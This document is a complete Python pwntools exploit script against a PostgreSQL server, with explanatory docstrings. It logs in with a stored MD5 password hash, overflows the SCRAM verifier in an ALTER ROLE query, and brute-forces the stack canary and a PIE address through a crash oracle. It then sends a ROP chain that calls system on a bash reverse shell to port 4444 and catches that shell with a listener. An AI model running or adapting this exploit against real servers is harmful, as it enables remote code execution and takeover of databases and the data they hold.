from pwn import *
import threading
# Query template used by every attempt below. alter.format(b64e(payload)) drops
# the base64 payload into the trailing `{}`, i.e. the ServerKey slot of the
# SCRAM-SHA-256 verifier; the iteration count, salt and StoredKey in front of it
# are fixed. Every request this script sends is therefore an ALTER ROLE on
# `test` with an oversized verifier -- the thing to look for in statement logs.
alter = "ALTER ROLE test PASSWORD 'SCRAM-SHA-256$4096:UrxBRgDElbaS4iwfRzn59g==$SErsniXa5gEr03cXhcFPLSM4C/22IKTJ9emThT+wPrM=:{}';"
def authenticate():
    '''
    Run a PostgreSQL MD5 password handshake on the module-global connection `r`.

    The StartupMessage is a fixed hex blob; decoded, it is protocol 3.0 with
    user=postgres, database=test, application_name=psql, client_encoding=UTF8.
    The server's AuthenticationMD5Password reply carries a 4-byte salt in its
    last four bytes; the answer is "md5" + md5(shadow_pass + salt).
    The outcome is only logged, never raised, so callers proceed either way.
    `hashlib` is not imported here; it appears to come in via `from pwn import *`.
    '''
    init = unhex("00000050000300007573657200706f7374677265730064617461626173650074657374006170706c69636174696f6e5f6e616d65007073716c00636c69656e745f656e636f64696e6700555446380000")
    r.send(init)
    resp = r.recv(1024)
    # Salt is the trailing 4 bytes of the AuthenticationMD5Password message
    # (assumes the whole message arrived in this single recv).
    salt = resp[-4:]
    # Used directly as the inner digest of the challenge response.
    # NOTE(review): looks like the hash as stored server-side rather than a
    # cleartext password -- with MD5 auth the stored hash is enough to answer.
    shadow_pass = b"32e12f215ba27cb750c9e093ce4b5127"
    enc_hash = hashlib.md5(shadow_pass + salt).hexdigest()
    log.debug(f"Response hash: {enc_hash}")
    # PasswordMessage: type 'p', length 0x28 = 4 (length) + 3 ("md5") + 32 (hex) + 1 (NUL).
    auth = "\x70\x00\x00\x00\x28"
    auth+= "md5"
    auth+= enc_hash + "\x00"
    r.send(auth)
    resp = r.recv(1024)
    # AuthenticationOk is 'R', int32 length, int32 code 0 -> bytes 5..8 are zero.
    if resp[5:9] == b"\x00" * 4:
        log.debug("Authentication successful")
    else:
        log.error("Authentication failed")
def sendQuery(query):
    '''
    Send `query` as a simple-query ('Q') message over `r` and return the reply text.

    The length field is 4 (itself) + len(query) + 1 (NUL). It counts characters,
    not encoded bytes, so it is only correct for ASCII queries -- true for the
    base64 payloads built in this script. Returns whatever recvS collects within
    1 s; if the server closes the connection the EOF surfaces to the caller
    (brute() relies on catching EOFError).
    '''
    data = b"Q"
    data += p32(len(query) + 5, endianness = "big")
    data += query.encode()
    data += b"\x00"
    r.send(data)
    return r.recvS(timeout = 1)
def brute(data, p):
    '''
    Recover the byte following `data` with a crash oracle, one fresh connection per guess.

    Each attempt authenticates, then sends the ALTER ROLE template with a payload
    of 72 filler bytes, the bytes known so far and one candidate byte. If a reply
    comes back the guess did not make the server drop the connection and the
    byte is returned; an EOFError (the server closed the connection, presumably
    a backend crash) means a wrong guess, and the next value is tried after 1 s.
    Returns None when all 256 values fail -- the caller's `+=` then raises
    TypeError. `p` is the pwntools progress logger used for status output.
    Server-side this shows as up to 256 authenticated connections per recovered
    byte, most of them ending abruptly.
    '''
    global r
    for i in range(0, 256):
        r = remote("127.0.0.1", 5432, level = 'error')
        authenticate()
        payload = b"A" * 72 + data + bytes([i])
        p.status(hexdump(data + bytes([i]), width=8))
        query = alter.format(b64e(payload))
        try:
            sendQuery(query)
            # Connection survived the query: accept this byte.
            r.close()
            return bytes([i])
        except EOFError:
            # Connection dropped: wrong guess; brief back-off before the next one.
            r.close()
            sleep(1)
            continue
def getCanary():
    '''
    Extend the module-global `canary` one byte at a time via brute() over 7 rounds.

    The `__main__` block seeds `canary` with a single byte, so after 7 rounds it
    is 8 bytes long. If brute() returns None the `+=` raises TypeError.
    '''
    global canary
    with log.progress('') as p:
        for i in range(7):
            p.status(hexdump(canary, width=8))
            canary += brute(canary, p)
def brutePIE(data, p):
    '''
    Recover the byte following `data` of the leaked PIE pointer, one connection per guess.

    The overflow now carries the recovered module-global `canary` and 40 more
    filler bytes before the guessed pointer bytes. The oracle differs from
    brute(): a guess is accepted when the reply text contains
    "MemoryContextAlloc" (presumably a server error message that only appears
    when the pointer is still usable); any other reply, or any exception, closes
    the connection and the next value is tried after 1 s. Returns None if no
    value matches. `p` is the pwntools progress logger used for status output.
    '''
    global r
    for i in range(0x00, 256):
        r = remote("127.0.0.1", 5432, level = 'error')
        authenticate()
        payload = b"A" * 72 + canary + b"B" * 40 + data + bytes([i])
        p.status(hexdump(data + bytes([i]), width=8))
        query = alter.format(b64e(payload))
        try:
            if "MemoryContextAlloc" in sendQuery(query):
                # Match. Note `r` is not closed on this path.
                return bytes([i])
            else:
                r.close()
        except:
            # NOTE(review): bare except also swallows KeyboardInterrupt and
            # SystemExit; `except Exception:` would be the narrowest safe form.
            r.close()
            sleep(1)
            continue
def getPIE():
    '''
    Extend the module-global `pieleak` one byte at a time via brutePIE() over 7 rounds.

    The `__main__` block seeds `pieleak` with a single byte, so after 7 rounds it
    is an 8-byte little-endian pointer. If brutePIE() returns None the `+=`
    raises TypeError.
    '''
    global pieleak
    with log.progress('') as p:
        for i in range(7):
            p.status(hexdump(pieleak, width=8))
            pieleak += brutePIE(pieleak, p)
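def rebase(address):
    '''
    Return `address` + the module-global PIE `base`, packed with p64.

    `base` is assigned in the `__main__` block after the PIE leak; calling this
    earlier raises NameError. Written as a def rather than an assigned lambda
    (PEP 8 E731); the call interface is unchanged.
    '''
    return p64(address + base)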
def buildChain():
    '''
    Build the ROP chain that execChain() appends after the canary and filler.

    Gadget and symbol offsets are relative to the PIE base and go through
    rebase(); they are tied to the exact binary this script was written for.
    The loop writes `cmd` to writable memory at `bss` eight bytes per iteration
    (pop rsi <- destination, pop rdi <- 8 bytes of cmd, mov [rsi], rdi). The
    tail then sets rdi = bss and returns into the `system` offset; the lone
    `ret` before it is presumably for 16-byte stack alignment.

    0x00000000001cf094: mov qword ptr [rsi], rdi; ret;
    '''
    mov_rsi_rdi = rebase(0x00000000001cf094)
    '''
    0x00000000000c55cd: pop rdi; ret;
    '''
    pop_rdi = rebase(0x00000000000c55cd)
    '''
    0x00000000000f9731: pop rsi; ret;
    '''
    pop_rsi = rebase(0x00000000000f9731)
    '''
    0x00000000002ebffc: ret;
    '''
    ret = rebase(0x00000000002ebffc)
    # Command run on the target; it connects back to the listener opened in
    # the `__main__` block (port 4444).
    cmd = b"/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'"
    # Destination for cmd (offset, rebased below).
    bss = 0x6fc000
    # Offset of the target function for the final call (not verified here).
    system = 0xaa330
    chain = b''
    for i in range(0, len(cmd), 8):
        chain += pop_rsi + rebase(bss + i)
        # cmd is 59 bytes, so the last chunk is NUL-padded, which also
        # terminates the string in memory.
        chain += pop_rdi + cmd[i:i+8].ljust(8, b"\x00")
        chain += mov_rsi_rdi
    chain += pop_rdi + rebase(bss)
    chain += ret
    chain += rebase(system)
    return chain
def execChain():
    '''
    Open one more authenticated connection and send the final overflow payload.

    Payload layout: 72 filler bytes, the recovered `canary`, 40 more filler
    bytes (the same gap brutePIE() used), then the chain from buildChain().
    Any exception from sendQuery -- presumably including the EOF once the
    connection is taken over -- is swallowed and the function just returns.
    The `__main__` block runs this on a thread while it waits on the listener.
    Assigns the module-global `r`; reads the module-global `canary`.
    '''
    global r
    r = remote("127.0.0.1", 5432, level = 'error')
    authenticate()
    chain = buildChain()
    payload = b"A" * 72 + canary + b"B" * 40 + chain
    query = alter.format(b64e(payload))
    try:
        sendQuery(query)
    except:
        # NOTE(review): bare except also hides KeyboardInterrupt/SystemExit;
        # `except Exception:` would keep the intended best-effort behaviour.
        return
if __name__ == "__main__":
    # Shared mutable state read and written by the helpers above.
    r = None
    # One byte of each 8-byte value is assumed known up front and the other
    # 7 are brute-forced: a zero low byte for the canary (presumably the usual
    # x86-64 canary layout) and 0xe0 for the pointer, matching the low byte of
    # the 0x290ce0 offset subtracted below.
    canary = b"\x00"
    pieleak = b"\xe0"
    log.info("Leaking canary")
    getCanary()
    log.success(f"Leaked canary: {canary.hex()}")
    log.info("Leaking PIE address")
    getPIE()
    # pieleak is in memory (little-endian) order; reversed here only for display.
    log.success(f"Leaked PIE Address: 0x{pieleak[::-1].hex()}")
    # The leaked pointer sits at a fixed offset from the PIE base; `base` is the
    # module-global that rebase() reads.
    base = u64(pieleak) - 0x290ce0
    log.success(f"Base address: {hex(base)}")
    log.info("Sending ROP chain")
    # execChain() blocks inside sendQuery, so it runs on a thread while this
    # thread waits for the connect-back on 4444 (the port named in buildChain's cmd).
    t = threading.Thread(target=execChain, args=[])
    t.start()
    l = listen("4444")
    l.wait_for_connection()
    l.interactive()
    l.close()